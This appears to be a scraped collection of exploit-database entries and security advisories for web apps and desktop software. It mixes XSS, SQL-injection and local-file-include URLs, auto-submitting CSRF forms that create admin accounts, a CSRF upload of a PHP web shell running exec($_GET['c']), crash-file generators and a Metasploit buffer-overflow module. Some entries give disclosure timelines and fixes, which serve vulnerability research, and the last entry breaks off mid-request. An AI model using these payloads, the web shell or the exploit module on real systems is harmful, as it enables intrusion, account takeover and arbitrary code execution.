HireHackking

source: https://www.securityfocus.com/bid/52221/info Dotclear is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Dotclear 2.4.1.2 is vulnerable; prior versions may also be affected. http://www.example.com/admin/comments.php?type=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/admin/comments.php?sortby=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/admin/comments.php?order=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/admin/comments.php?status=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

source: https://www.securityfocus.com/bid/52236/info Fork CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Fork CMS versions prior to 3.2.7 are vulnerable. http://www.example.com/private/en/locale/index?name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

source: https://www.securityfocus.com/bid/52221/info Dotclear is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Dotclear 2.4.1.2 is vulnerable; prior versions may also be affected. http://www.example.com/admin/plugin.php?p=tags&m=tag_posts&tag=[TAG]&page=1%27%22%3E%3Cscript%3Ea lert%28document.cookie%29;%3C/script%3E

# source: https://www.securityfocus.com/bid/52224/info # # Traidnt Topics Viewer is prone to a cross-site request-forgery vulnerability. # # Exploiting this issue may allow a remote attacker to perform certain administrative actions, gain unauthorized access to the affected application, or delete certain data. Other attacks are also possible. # # Traidnt Topics Viewer 2.0 BETA 1 is vulnerable; other versions may also be affected. # <html> <body onload="javascript:document.forms[0].submit()"> <p>by:thegreenhornet</p> <form method="POST" name="form0" action=" http://www.example.com/top/admincp/main.php?op=add-admin"> <input type="hidden" name="u_name" value="admin2"/> <input type="hidden" name="u_m_pass" value="123456"/> <input type="hidden" name="u_email" value="WW22@rwoot.com"/> </form> </body>

source: https://www.securityfocus.com/bid/52236/info Fork CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Fork CMS versions prior to 3.2.7 are vulnerable. http://www.example.com/private/en/error?type=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/private/en/error?type=action-not-allowed&querystring=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E.1

source: https://www.securityfocus.com/bid/52262/info starCMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/index.php?q=[Xss]&r=5&lang=de&actionsuche=yes

source: https://www.securityfocus.com/bid/52273/info Splash PRO is prone to a denial-of-service vulnerability. Attackers can exploit this issue to crash the affected application, denying service to legitimate users. Splash PRO 1.12.1 is vulnerable; other versions may also be affected. PoC = "\x52\x49\x46\x46\x3c\xad\x08\x00\x41\x56\x49\x20\x4c\x49\x53\x54" PoC += "\x72\x22\x00\x00\x68\x64\x72\x6c" payload = (PoC) f = open("Crash.avi","wb") f.write(payload) f.close()

source: https://www.securityfocus.com/bid/52295/info Etano is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Etano versions 1.20 to 1.22 are vulnerable; other versions may be affected. http://www.example.com/etano/search.php?&#039;";><script>alert(/XSS/)</script> http://www.example.com/etano/search.php?st=&#039;";><script>alert(/XSS/)</script> http://www.example.com/etano/search.php?f17_city=&#039;";><script>alert(/XSS/)</script>&f17_country=0&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto=1 http://www.example.com/etano/search.php?f17_city=0&f17_country=&#039;";><script>alert(/XSS/)</script>&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto=1 http://www.example.com/etano/search.php?f17_city=0&f17_country=0&f17_state=&#039;";><script>alert(/XSS/)</script>&f17_zip=3&f19=0&st=basic&wphoto=1 http://www.example.com/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=&#039;";><script>alert(/XSS/)</script>&f19=0&st=basic&wphoto=1 http://www.example.com/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19=&#039;";><script>alert(/XSS/)</script>&st=basic&wphoto=1 http://www.example.com/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19=0&st=&#039;";><script>alert(/XSS/)</script>&wphoto=1 http://www.example.com/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto=&#039;";><script>alert(/XSS/)</script> http://www.example.com/etano/search.php?search=&#039;";><script>alert(/XSS/)</script>&v=g http://www.example.com/etano/search.php?search=51d43831f5dde83a4eedb23895f165f6&v=&#039;";><script>alert(/XSS/)</script> http://www.example.com/etano/search.php?st=xss";><script>alert(/XSS/)</script>&user=unknown

source: https://www.securityfocus.com/bid/52293/info LastGuru ASP GuestBook is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/victim/View.asp?E_Mail=webmaster@lastguru.com' and 'a'='a

source: https://www.securityfocus.com/bid/52295/info Etano is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Etano versions 1.20 to 1.22 are vulnerable; other versions may be affected. http://www.example.com/etano/photo_search.php?&#039;";><script>alert(/XSS/)</script> http://www.example.com/etano/photo_search.php?st=&#039;";><script>alert(/XSS/)</script>

source: https://www.securityfocus.com/bid/52295/info Etano is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Etano versions 1.20 to 1.22 are vulnerable; other versions may be affected. http://www.example.com/etano/photo_view.php?photo_id=1&return=";><script>alert(/XSS/)</script>

Document Title: =============== Grindr 2.1.1 iOS Bug Bounty #2 - Denial of Service Software Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1418 Release Date: ============= 2015-05-02 Vulnerability Laboratory ID (VL-ID): ==================================== 1418 Common Vulnerability Scoring System: ==================================== 3.3 Product & Service Introduction: =============================== Grindr, which first launched in 2009, has exploded into the largest and most popular all-male location-based social network out there. With more than 5 million guys in 192 countries around the world -- and approximately 10,000 more new users downloading the app every day -- you’ll always find a new date, buddy, or friend on Grindr. Grindr is a simple app that uses your mobile device’s location-based services to show you the guys closest to you who are also on Grindr. How much of your info they see is entirely your call. (Copy of the Vendor Homepage: http://grindr.com/learn-more ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered a local and remote denial of servie vulnerability in the official Grindr v2.1.1 iOS mobile web-application. Vulnerability Disclosure Timeline: ================================== 2015-01-22: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security) 2015-01-22: Vendor Notification (Grinder - Bug Bounty Program) 2015-02-02: Vendor Response/Feedback (Grinder - Bug Bounty Program) 2015-04-01: Vendor Fix/Patch (Grindr Developer Team - Reward: x & Manager: x) 2015-05-04: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Grindr LLC Product: Grinder - iOS Mobile Web Application (API) 2.2.1 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A local and remote Denial of Service vulnerability has been discovered in the official Grindr v2.1.1 iOS mobile web-application. The attacker injects a script code tag or multiple termination strings (%00%20%00%20%00) to the Display Name input field of the Edit Profile module. After the inject the service stored the malicious values as DisplayName. After the inject a random user is processing to click in the profile the contact information (facebook/twitter). After that the victim wants to copy the link and an internal service corruption occurs thats crashs the mobile app. The issue is local and remote exploitable. Vulnerable Module(s): [+] Edit Profile Vulnerable Parameter(s): (Input) [+] Display Name Affected Module(s): [+] Contact > Social Network > Copy Link Proof of Concept (PoC): ======================= The denial of service web vulnerability can be exploited by remote attacker and local user accounts with low user interaction (click). To demonstrate the vulnerability or to reproduce the issue follow the provided information and steps below to continue. Manual steps to reproduce ... 1. Open the grindr mobile application 2. Inject a script code tag as Display Name or use the terminated String with empty values 3. Save and click in the profile the contact button (exp. facebook) 4. Click to the send button ahead and push the Copy Link function 5. The app service is getting terminated with an uncaught exception because of an internal parsing error Note:To exploit the issue remotly the profile needs to be shared with another user and then the user only needs to push the same way the social contact button. PoC Video: Solution - Fix & Patch: ======================= First step is to prevent the issue by a secure restriction of the input. Attach a own excpetion-handling to prevent next to the insert itself. The social network accounts that are linked do not allow special chars in the username. The grindr ios app and the android app allows to register an account and to insert own scripts <html5> or null strings that corrupts the process of copy the link by an error. After the restriction has been set in the code of both (api) the issue can not anymore execute to shutdown anothers users account. Even if this issue execution is prevented that was only a solution to prevent. To fix the bug ... Connect for example ios device with the running app to windows. Sync the process and reproduce the remote error and local error. Move to the iOS error folder that has been synced. Get the error attach another debugger and so on ... Security Risk: ============== The secuirty risk of the local and remote denial of service vulnerability in the copy link function that corrupts is estimated as medium. Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

# Exploit Title: Apache Xerces-C XML Parser (< 3.1.2) DoS POC # Date: 2015-05-03 # Exploit Author: beford # Vendor Homepage: http://xerces.apache.org/#xerces-c # Version: Versions prior to 3.1.2 # Tested on: Ubuntu 15.04 # CVE : CVE-2015-0252 Apache Xerces-C XML Parser Crashes on Malformed Input I believe this to be the same issue that was reported on CVE-2015-0252, posting this in case anyone is interested in reproducing it. Original advisory: https://xerces.apache.org/xerces-c/secadv/CVE-2015-0252.txt $ printf "\xff\xfe\x00\x00\x3c" > file.xml $ DOMPrint ./file.xml # Ubuntu 15.04 libxerces-c3.1 package Segmentation fault $ ./DOMPrint ./file.xml # ASAN Enabled build ================================================================= ==6831==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb5d9d87c at pc 0x836a721 bp 0xbf8127a8 sp 0xbf812798 READ of size 1 at 0xb5d9d87c thread T0 #0 0x836a720 in xercesc_3_1::XMLReader::refreshRawBuffer() xercesc/internal/XMLReader.cpp:1719 #1 0x836a720 in xercesc_3_1::XMLReader::xcodeMoreChars(unsigned short*, unsigned char*, unsigned int) xercesc/internal/XMLReader.cpp:1761 #2 0x837183f in xercesc_3_1::XMLReader::refreshCharBuffer() xercesc/internal/XMLReader.cpp:576 #3 0x837183f in xercesc_3_1::XMLReader::peekString(unsigned short const*) xercesc/internal/XMLReader.cpp:1223 #4 0x83ad0ae in xercesc_3_1::ReaderMgr::peekString(unsigned short const*) xercesc/internal/ReaderMgr.hpp:385 #5 0x83ad0ae in xercesc_3_1::XMLScanner::checkXMLDecl(bool) xercesc/internal/XMLScanner.cpp:1608 #6 0x83b6469 in xercesc_3_1::XMLScanner::scanProlog() xercesc/internal/XMLScanner.cpp:1244 #7 0x8d69220 in xercesc_3_1::IGXMLScanner::scanDocument(xercesc_3_1::InputSource const&) xercesc/internal/IGXMLScanner.cpp:206 #8 0x83cd3e7 in xercesc_3_1::XMLScanner::scanDocument(unsigned short const*) xercesc/internal/XMLScanner.cpp:400 #9 0x83ce728 in xercesc_3_1::XMLScanner::scanDocument(char const*) xercesc/internal/XMLScanner.cpp:408 #10 0x849afc5 in xercesc_3_1::AbstractDOMParser::parse(char const*) xercesc/parsers/AbstractDOMParser.cpp:601 #11 0x8050bf2 in main src/DOMPrint/DOMPrint.cpp:398 #12 0xb6f5272d in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x1872d) #13 0x805d3b5 (/ramdisk/DOMPrint+0x805d3b5) 0xb5d9d87c is located 0 bytes to the right of 163964-byte region [0xb5d75800,0xb5d9d87c) allocated by thread T0 here: #0 0xb72c3ae4 in operator new(unsigned int) (/usr/lib/i386-linux-gnu/libasan.so.1+0x51ae4) #1 0x8340cce in xercesc_3_1::MemoryManagerImpl::allocate(unsigned int) xercesc/internal/MemoryManagerImpl.cpp:40 #2 0x8094cb2 in xercesc_3_1::XMemory::operator new(unsigned int, xercesc_3_1::MemoryManager*) xercesc/util/XMemory.cpp:68 #3 0x8daaaa7 in xercesc_3_1::IGXMLScanner::scanReset(xercesc_3_1::InputSource const&) xercesc/internal/IGXMLScanner2.cpp:1284 #4 0x8d6912a in xercesc_3_1::IGXMLScanner::scanDocument(xercesc_3_1::InputSource const&) xercesc/internal/IGXMLScanner.cpp:198 #5 0x83cd3e7 in xercesc_3_1::XMLScanner::scanDocument(unsigned short const*) xercesc/internal/XMLScanner.cpp:400 #6 0x83ce728 in xercesc_3_1::XMLScanner::scanDocument(char const*) xercesc/internal/XMLScanner.cpp:408 #7 0x849afc5 in xercesc_3_1::AbstractDOMParser::parse(char const*) xercesc/parsers/AbstractDOMParser.cpp:601 #8 0x8050bf2 in main src/DOMPrint/DOMPrint.cpp:398 #9 0xb6f5272d in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x1872d) SUMMARY: AddressSanitizer: heap-buffer-overflow xercesc/internal/XMLReader.cpp:1719 xercesc_3_1::XMLReader::refreshRawBuffer()

Document Title: =============== PhotoWebsite v3.1 iOS - File Include Web Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1474 Release Date: ============= 2015-05-04 Vulnerability Laboratory ID (VL-ID): ==================================== 1476 Common Vulnerability Scoring System: ==================================== 6.6 Product & Service Introduction: =============================== Photo Website lets your Camera Roll to become a website. The app let the iphone/ipad become a website. It is a wifi network app&#65292; let you access camera roll photos over your pc browser. Now share Camera Roll to your friend is a very simple event. Fast browsing of thumbnails (https://itunes.apple.com/de/app/photo-website/id543436097) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered a locla file include vulnerability in the official PhotoWebsite v3.1 iOS mobile web-application. Vulnerability Disclosure Timeline: ================================== 2015-05-04: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== AirPhoto Product: PhotoWebsite - iOS Mobile Web Application 3.1 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A local file include web vulnerability has been discovered in the official PhotoWebsite v3.1 iOS mobile web-application. The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to compromise the mobile web-application. The web vulnerability is located in the `mDirNameList` and `mDirUrlList` values of the `airphotos.ma - upload` module. Remote attackers are able to inject own files with malicious `mDirNameList` values in the `upload.action` sync request to compromise the mobile web-application. The local file/path include execution occcurs in the index file dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of the `wifi interface` in connection with the vulnerable upload service module. Remote attackers are also able to exploit the `mDirNameList` and `mDirUrlList` validation issue in combination with persistent injected script codes to execute unique local malicious attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST (upload) or Sync(device). To exploit the bug it is required to use the local device > wifi sync or (remote) the wifi gui. The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.6. Exploitation of the local file include vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the local file include web vulnerability results in mobile application or device compromise. Request Method(s): [+] Sync Vulnerable Module(s): [+] upload Vulnerable File(s): [+] airphotos.ma Vulnerable Parameter(s): [+] mDirNameList [+] mDirUrlList Affected Module(s): [+] File Dir Index Proof of Concept (PoC): ======================= The local file include web vulnerability can be exploited by local attackers without privileged application user account or user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC: airphotos.ma <script language= "JavaScript" type= "text/javascript"> var mImgList =[]; var mWidthList= []; var mHeightList= []; var mThumWidth=144 var mDirNameList=["">[LOCAL FILE INCLUDE VULNERABILITY!]", "Camera Roll", "My Photo Stream", ]; var mDirUrlList=["@%22%3E%3C[LOCAL FILE INCLUDE VULNERABILITY!]%3E%5C", "@Camera%20Roll%5C", "@My%20Photo%20Stream%5C", ]; var mUserWH=true;; var mUseApShow=false;; </script> Reference(s): http://localhost:1860/airphotos.ma Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse and encode of the vulnerable `mDirNameList` and `mDirUrlList` values. Restrict the input for folder and album names on sync and disallow special chars. Encode the file dir index list that shows the malicious context without secure parse to prevent further file include or request injection attacks. Security Risk: ============== The security risk of the local file include web vulnerability in the photowebsite wifi app is estimated as high. (CVSS 6.6) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

source: https://www.securityfocus.com/bid/52296/info Open Realty is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. Open Realty version 2.5.8 is vulnerable; other versions may also be affected. http://www.example.com/open-realty2.5.8/?select_users_template=../../../../../../../../../../../../../../../etc/passwd%00

# Exploit Title: Multiple Persistent XSS & CSRF & File Upload on Ultimate Product Catalogue 3.1.2 # Google Dork: inurl:"SingleProduct" intext:"Back to catalogue" intext:"Category", inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/" # Date: 22/04/2015 # Exploit Author: Felipe Molina de la Torre (@felmoltor) # Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/ # Software Link: https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip # Version: <= 3.1.2, Comunicated and Fixed by the Vendor in 3.1.5 # Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu) # CVE : N/A # Category: webapps 1. Summary: Ultimate Product Catalogue is a responsive and easily customizable plugin for all your product catalogue needs. It has +63.000 downloads, +4.000 active installations. Product Name and Description and File Upload formulary of plugin Ultimate Product Catalog lacks of proper CSRF protection and proper filtering. Allowing an attacker to alter a product pressented to a customer or the wordpress administrators and insert XSS in his product name and description. It also allows an attacker to upload a php script though a CSRF due to a lack of file type filtering when uploading it. 2. Vulnerability timeline: - 22/04/2015: Identified in version 3.1.2 - 22/04/2015: Comunicated to developer company etoilewebdesign.com - 22/04/2015: Response from etoilewebdesign.com and fixed two SQLi in 3.1.3 but not these vulnerabilities. - 28/04/2015: Fixed version in 3.1.5 without notifying me. 3. Vulnerable code: In file html/ProductPage multiple lines. 3. Proof of concept: https://www.youtube.com/watch?v=roB_ken6U4o ---------------------------------------------------------------------------------------------- ------------- CSRF & XSS in Product Description and Name ----------- ---------------------------------------------------------------------------------------------- <iframe width=0 height=0 style="display:none" name="csrf-frame"></iframe> <form method='POST' action='http:// <web>/wp-admin/admin.php?page=UPCP-options&Action=UPCP_EditProduct&Update_Item=Product&Item_ID=16' target="csrf-frame" id="csrf-form"> <input type='hidden' name='action' value='Edit_Product'> <input type='hidden' name='_wp_http_referer' value='/wp-admin/admin.php?page=UPCP-options&Action=UPCP_EditProduct&Update_Item=Product&Item_ID=16'/> <input type='hidden' name='Item_Name' value="Product name</a><script>alert('Product Name says: '+document.cookie)</script><a>"/> <input type='hidden' name='Item_Slug' value='asdf'/> <input type='hidden' name='Item_ID' value='16'/> <input type='hidden' name='Item_Image' value=' http://i.imgur.com/6cWKujq.gif'> <input type='hidden' name='Item_Price' value='666'> <input type='hidden' name='Item_Description' value="Product description says<script>alert('Product description says: '+document.cookie)</script>"/> <input type='hidden' name='Item_SEO_Description' value='seo desc'> <input type='hidden' name='Item_Link' value=''> <input type='hidden' name='Item_Display_Status' value='Show'> <input type='hidden' name='Category_ID' value=''> <input type='hidden' name='SubCategory_ID' value=''> <input style="display:none" type='submit' value='submit'> </form> <script>document.getElementById("csrf-form").submit()</script> ---------------------------------------------------------------------------------------------- -------- CSRF & File Upload in Product Description and Name ------ ---------------------------------------------------------------------------------------------- <html> <body onload="submitRequest();"> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://<web>/wp-admin/admin.php?page=UPCP-options&Action=UPCP_AddProductSpreadsheet&DisplayPage=Product", true); xhr.setRequestHeader("Host", "<web>"); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"); xhr.setRequestHeader("Cache-Control", "max-age=0"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8,es;q=0.6"); xhr.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.37 Safari/537.36"); xhr.setRequestHeader("Accept-Encoding", "gzip, deflate"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundarylPTZvbxAcw0q01W3"); var body = "------WebKitFormBoundarylPTZvbxAcw0q01W3\r\n" + "Content-Disposition: form-data; name=\"Products_Spreadsheet\"; filename=\"cooldog.php\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "<?php\r\n" + "exec($_GET['c'],$output);\r\n" + "foreach ($output as $line) {\r\n" + "echo \"<br/>\".$line;\r\n" + "}\r\n" + "?>\r\n" + "------WebKitFormBoundarylPTZvbxAcw0q01W3\r\n" + "Content-Disposition: form-data; name='submit'\r\n" + "\r\n" + "Add New Products\r\n" + "------WebKitFormBoundarylPTZvbxAcw0q01W3--\r\n" ; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input style="display:none;" type="submit" value="Up!" onclick="submitRequest();" /> </form> </body> </html> Te file cooldog.php is no available in path http:// <web>/wp-content/plugins/ultimate-product-catalogue/product-sheets/cooldog.php 4. Solution: Update to version 3.1.5

source: https://www.securityfocus.com/bid/52306/info 11in1 CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 11in1 1.2.1 is vulnerable; other versions may also be affected. http://www.example.com/11in1/admin/comments?topicID=1'[SQL Injection Vulnerability!]

### #[+] Author: TUNISIAN CYBER #[+] Exploit Title: RM Downloader v2.7.5.400 Local Buffer Overflow (MSF) #[+] Date: 25-03-2015 #[+] Type: Local Exploits #[+] Tested on: WinXp/Windows 7 Pro #[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/49/Mini-streamRM-MP3Converter.exe?token=1427318981_98f71d0e10e2e3bd2e730179341feb0a&fileName=Mini-streamRM-MP3Converter.exe #[+] Twitter: @TCYB3R ## ## # $Id: rmdownloader_bof.rb 2015-04-01 03:03 TUNISIAN CYBER $ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'Free MP3 CD Ripper 1.1 Local Buffer Overflow Exploit', 'Description' => %q{ This module exploits a stack buffer overflow in RM Downloader v2.7.5.400 creating a specially crafted .ram file, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'TUNISIAN CYBER', # Original 'TUNISIAN CYBER' # MSF Module ], 'Version' => 'Version 2.7.5.400', 'References' => [ [ 'URL', 'https://www.exploit-db.com/exploits/36502/' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00\x0a\x0d", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP-SP3 (EN)', { 'Ret' => 0x7C9D30D7} ] ], 'Privileged' => false, 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ false, 'The file name.', 'msf.ram']), ], self.class) end def exploit sploit = rand_text_alphanumeric(35032) # Buffer Junk sploit << [target.ret].pack('V') sploit << make_nops(4) sploit << payload.encoded tc = sploit print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(tc) end end

source: https://www.securityfocus.com/bid/52306/info 11in1 CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 11in1 1.2.1 is vulnerable; other versions may also be affected. http://www.example.com/11in1/admin/tps?id=1'[SQL Injection Vulnerability!]

source: https://www.securityfocus.com/bid/52319/info Fork CMS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. Fork CMS 3.2.7 and 3.2.6 are vulnerable; other versions may also be affected. http://www.example.com/private/en/locale/edit?id=37&value="><script>alert("ZSL");</script> http://www.example.com/private/en/locale/edit?id=37&name="><script>alert("ZSL");</script> http://www.example.com/private/en/locale/edit?id=37&type[]="><script>alert("ZSL");</script> http://www.example.com/private/en/locale/edit?id=37&module="><script>alert("ZSL");</script> http://www.example.com/private/en/locale/edit?id=37&application="><script>alert("ZSL");</script> http://www.example.com/private/en/locale/edit?id=37&language[]="><script>alert("ZSL");</script> Parameter: form_token Method: POST - POST /private/en/authentication/?querystring=/private/en HTTP/1.1 Content-Length: 134 Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=t275j7es7rj2078a25o4m27lt0; interface_language=s%3A2%3A%22en%22%3B; 